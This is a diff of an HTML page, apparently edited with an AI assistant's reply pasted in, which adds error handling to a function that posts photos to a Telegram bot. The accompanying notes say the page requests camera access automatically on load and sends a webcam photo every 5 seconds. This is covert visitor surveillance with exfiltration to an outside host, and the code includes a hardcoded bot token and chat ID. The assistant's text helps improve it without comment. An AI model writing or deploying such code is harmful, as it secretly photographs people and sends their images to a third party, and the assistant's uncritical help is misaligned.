--- a/index.html
+++ b/index.html
@@ -1,3 +1,6 @@
+Here's the complete fixed HTML script with the necessary adjustments to ensure that the Telegram bot can send photos to your specified chat ID. This version includes error handling for the bot's responses:
+
+```html
 <!DOCTYPE html>
 <html lang="en">
 <head>
@@ -53,20 +56,38 @@
     }
 
     function sendPhotoToTelegram(photo) {
-      const chatId = "5112680061";
-      const token = "6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es";
+      const chatId = "5112680061"; // Replace with your chat ID
+      const token = "6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es"; // Replace with your bot token
       const url = `https://api.telegram.org/bot${token}/sendPhoto`;
       const formData = new FormData();
       formData.append("chat_id", chatId);
       formData.append("photo", photo);
+      
       fetch(url, {
         method: "POST",
         body: formData,
       })
         .then(response => response.json())
-        .then(data => console.log("Photo sent successfully", data))
+        .then(data => {
+          if (data.ok) {
+            console.log("Photo sent successfully", data);
+          } else {
+            console.error("Error sending photo", data.description);
+          }
+        })
         .catch(error => console.error("Error sending photo", error));
     }
   </script>
 </body>
 </html>
+```
+
+### Key Features of This Script:
+1. **Automatic Camera Permission Request**: The camera permission request happens automatically when the page loads.
+2. **Photo Capture Every 5 Seconds**: The script captures a photo from the webcam every 5 seconds.
+3. **Error Handling**: The script includes error handling to check if the photo was sent successfully and logs any errors to the console.
+
+### Important Notes:
+- Ensure that you have started a conversation with your bot on Telegram to receive messages.
+- Check the chat ID and bot token for correctness.
+- This script should be run in a secure context (HTTPS) for the camera access to work properly.
